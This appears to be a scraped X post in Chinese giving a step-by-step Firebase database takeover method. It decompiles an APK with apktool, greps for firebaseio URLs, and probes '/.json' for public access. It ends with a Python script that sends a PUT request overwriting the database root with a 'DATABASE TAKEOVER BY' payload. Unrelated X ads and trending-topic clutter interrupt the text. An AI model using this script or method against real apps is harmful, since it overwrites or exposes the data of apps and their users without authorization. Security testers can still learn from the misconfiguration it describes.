错误配置的Firebase DB 接管
Firebase 是一个基于云的 NoSQL 数据库,可在用户之间实时存储和同步数据。如果开发人员未能正确配置它,会导致配置错误并使其被攻击者接管。
1.使用apktool d example.apk反编译apk文件
2.进入反编译文件夹并使用grep -iR firebaseio命令搜索firebaseio.com
Post
Conversation
![CDxiadong](data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="96" height="96"><rect fill-opacity="0"/></svg>)
We're giving out up to $30,000 grants to small (but mighty) app builders
@ the best devs you know and we'll give you $1,000 when their app goes live on Highlight
Details in the reply. Join the rebellion 
0:32
Download Free
3.假设找到了firebase的url,可以复制到浏览器中并添加.json访问尝试是否含有漏洞。
差不多长这样:https://example.firebaseio .com/.json
此时,如果能够访问其中的信息,则意味着数据库信息是公开的,那么是一个非常严重的漏洞,因为能够访问Firebase 的实时数据库
如果没有看到任何信息,而只是null,则意味着我们可以继续尝试利用。
如果看到“权限被拒绝”,则意味着数据库配置正确,则无法执行接管攻击。
4.编写脚本尝试接管:
import requests
url = "https://example-db. firebaseio.com/.json"
data = {"Exploit": "Successfull", "DATABASE TAKEOVER BY": "Dhabal"}
try:
response = requests.put(url, json=data)
print("Database takeover successful.") if response.status_code == 200 else print(f"Failed: {response.status_code}")
except requests.RequestException as e:
print(f"Error: {e}")
Discover more
Sourced from across X
Trending now
What’s happening
Esports World Cup 2024
Esports
LIVE
#Stree2
Stree vs Sarkata! India’s most loved horror-comedy is back
Promoted by Maddockfilms
Trending in India
#Microsoft
5,427 posts
Hardik Pandya · Trending
#Divorce
20.6K posts